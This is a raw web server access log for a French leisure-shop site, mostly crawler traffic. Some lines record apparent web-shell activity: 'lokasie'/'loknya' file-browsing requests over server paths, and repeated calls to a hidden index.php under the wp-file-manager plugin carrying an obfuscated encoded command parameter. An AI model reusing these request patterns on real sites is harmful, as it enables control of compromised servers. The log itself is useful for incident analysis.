2a03:2880:f800:: - - [18/Aug/2026:00:12:39 +0200] "GET /?shop/items/Y12998273887/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:12:40 +0200] "GET /?shop/items/C33932266730/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:12:43 +0200] "GET /?shop/items/P71411251528/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:12:48 +0200] "GET /?shop/items/P322552223/ HTTP/1.1" 200 51727 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:12:48 +0200] "GET /?shop/items/K3604684325/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:12:54 +0200] "GET /?lokasie=/proc/sys/net/ipv6//xfrm6_gc_thresh&loknya=/proc/sys/net/ipv6/ HTTP/1.1" 200 4098 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv6/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:13:07 +0200] "GET /?shop/items/H56011146910/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
43.159.143.0 - - [18/Aug/2026:00:13:18 +0200] "GET /?lokasie=/homepages/11/d4298920294/htdocs/wordpress/wp-trackback.php&loknya=/homepages/11/d4298920294/htdocs/wordpress HTTP/1.1" 200 10349 cultureloisirs.club "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:13:20 +0200] "GET /?shop/items/Y12998242604/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:13:32 +0200] "GET /?shop/items/H56011275345/ HTTP/1.1" 200 51699 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
66.249.66.0 - - [18/Aug/2026:00:13:33 +0200] "GET /?h=34940422403999 HTTP/1.1" 200 816766 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:13:42 +0200] "GET /?h=27724144091225 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
66.249.66.0 - - [18/Aug/2026:00:13:47 +0200] "GET /?h=60945902735362 HTTP/1.1" 200 786880 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:13:50 +0200] "GET /?shop/items/C3393297193/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
66.249.66.0 - - [18/Aug/2026:00:13:50 +0200] "GET /?h=5242119278138 HTTP/1.1" 200 792043 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
74.7.243.0 - - [18/Aug/2026:00:13:51 +0200] "GET /?lokasie=/proc/sys/net/ipv4//xfrm4_gc_thresh&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 200 4098 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:13:59 +0200] "GET /?h=37101832351343 HTTP/1.1" 200 51727 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:14:06 +0200] "GET /sitemap321.xml HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:14:11 +0200] "GET /?shop/items/K40856236721/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:14:15 +0200] "GET /?shop/items/Y1299883154/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:14:21 +0200] "GET /?shop/items/P3225566807/ HTTP/1.1" 200 51727 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:14:27 +0200] "GET /?shop/items/M2692254454/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
66.249.66.0 - - [18/Aug/2026:00:14:30 +0200] "GET /?shop/items/F7394976843/ HTTP/1.1" 200 835149 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:14:32 +0200] "GET /?h=17553344704810 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:14:34 +0200] "GET /?h=50293501529933 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
66.249.66.0 - - [18/Aug/2026:00:14:37 +0200] "GET /?h=25276033273014 HTTP/1.1" 200 817949 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.66.0 - - [18/Aug/2026:00:14:37 +0200] "GET /?shop/items/H56011126281/ HTTP/1.1" 200 810784 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:14:38 +0200] "GET /?shop/items/C3393248490/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:14:42 +0200] "GET /?lokasie=/proc/sys/net/ipv4//ip_local_reserved_ports&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 200 4101 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:14:44 +0200] "GET /?shop/items/K3604654820/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:14:49 +0200] "GET /?h=38210991820420 HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:14:53 +0200] "GET /?shop/items/U61302233859/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:14:57 +0200] "GET /?shop/items/C33932227653/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
82.165.90.0 - - [18/Aug/2026:00:11:45 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383330352p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343730352q6161633834366435313265636530613933356539636431353432663638626565222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:12:07 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383332372p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343732372q3362326261323638383030346636356133313539373964373830313762616130222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:12:29 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383334392p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343734392q6561633331373363636262303063623063383733346531613430396161343130222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:12:51 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383337312p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343737312q6163326461336164396435306663643536653330633738333035376631356239222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:13:14 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383339342p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343739342q6536396661363065353161663437346634316162616366386165383362313138222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:13:36 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383431362p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343831362q3637623335613030623835623762363734373435383031666665633832666665222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:13:58 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383433382p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343833382q6363636537633837326238333662336135633965333436313938643730353661222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
82.165.90.0 - - [18/Aug/2026:00:14:20 +0200] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/cmake/cmake/index.php?ARRAY=7o2230223n313738373030383436302p2231223n22687474703n5p2s5p2s7n733030347631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738373030343836302q3438343031336231616666303362366131346332376530353466626463636563222p2232223n226361393631643434646130386632616339383866626635356534396138383639222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q34382q36302q36382q37352q39302q3237227q HTTP/1.1" 200 52 cultureloisirs.club "-" "-" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:02 +0200] "GET /?shop/items/H5601176881/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:05 +0200] "GET /?shop/items/K40856130724/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:05 +0200] "GET /?shop/items/P71411166805/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:10 +0200] "GET /?shop/items/Y12998250115/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
66.249.66.0 - - [18/Aug/2026:00:15:10 +0200] "GET /?h=92258882280375 HTTP/1.1" 200 819341 cultureloisirs.club "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:12 +0200] "GET /?shop/items/U6130210103/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:17 +0200] "GET /?h=12944862488478 HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:18 +0200] "GET /?shop/items/K36046128375/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:18 +0200] "GET /?shop/items/P71411205100/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:25 +0200] "GET /?shop/items/K36046265177/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
74.7.243.0 - - [18/Aug/2026:00:15:26 +0200] "GET /?lokasie=/proc/sys/net/ipv4//tcp_fwmark_accept&loknya=/proc/sys/net/ipv4/ HTTP/1.1" 200 4091 cultureloisirs.club "https://cultureloisirs.club/?loknya=/proc/sys/net/ipv4/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:27 +0200] "GET /?shop/items/P3225584923/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:28 +0200] "GET /sitemap790.xml HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:38 +0200] "GET /?shop/items/K4085614443/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:40 +0200] "GET /?shop/items/H5601158957/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:42 +0200] "GET /?shop/items/U61302259051/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:56 +0200] "GET /?shop/items/H56011224570/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:15:59 +0200] "GET /?h=22250151527085 HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:16:01 +0200] "GET /?shop/items/K3604632705/ HTTP/1.1" 429 267 cultureloisirs.club "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
2a03:2880:f800:: - - [18/Aug/2026:00:16:03 +0200] "GET /?shop/items/P32255219973/ HTTP/1.1" 200 51700 cultureloisirs.club "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))" "-"
